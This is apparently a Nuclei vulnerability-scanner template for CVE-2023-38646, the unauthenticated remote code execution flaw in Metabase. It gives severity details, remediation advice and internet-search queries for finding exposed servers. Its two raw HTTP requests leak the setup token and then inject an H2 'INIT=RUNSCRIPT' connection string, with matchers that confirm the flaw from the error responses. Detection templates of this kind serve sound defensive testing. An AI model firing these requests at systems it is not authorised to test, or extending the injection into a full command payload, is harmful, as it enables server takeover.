id: CVE-2023-38646

info:
  name: Metabase < 0.46.6.1 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Metabase to version 0.46.6.1 or later to mitigate this vulnerability.
  reference:
    - https://www.metabase.com/blog/security-advisory
    - https://github.com/metabase/metabase/releases/tag/v0.46.6.1
    - https://mp.weixin.qq.com/s/ATFwFl-D8k9QfQfzKjZFDg
    - https://news.ycombinator.com/item?id=36812256
    - https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
    - https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-38646
    epss-score: 0.62661
    epss-percentile: 0.97553
    cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: metabase
    product: metabase
    shodan-query: http.title:"Metabase"
    fofa-query: app="Metabase"
  tags: cve2023,cve,metabase,oss,rce
variables:
  file: "./plugins/vertica.metabase-driver.jar"

http:
  - raw:
      - |
        GET /api/session/properties HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /api/setup/validate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "token":"{{token}}",
           "details":{
              "details":{
                 "subprotocol":"h2",
                 "classname":"org.h2.Driver",
                 "advanced-options":true,
                 "subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\;"
              },
              "name":"{{randstr}}",
              "engine":"postgres"
           }
        }

    extractors:
      - type: json
        part: body_1
        name: token
        json:
          - .["setup-token"]
        internal: true
    matchers:
      - type: dsl
        dsl:
          - contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException")
          - status_code_2 == 400
        condition: and
# digest: 4a0a0047304502203102c0be553270c1adbdbabe997bbaea6e3adaf6c2c1e46a703305f68834c2cc02210094818702b8fab66d0d303cf006c3a5a3a12f0140323564cfd177e55e21325a0f:922c64590222798bb761d5b6d8e72950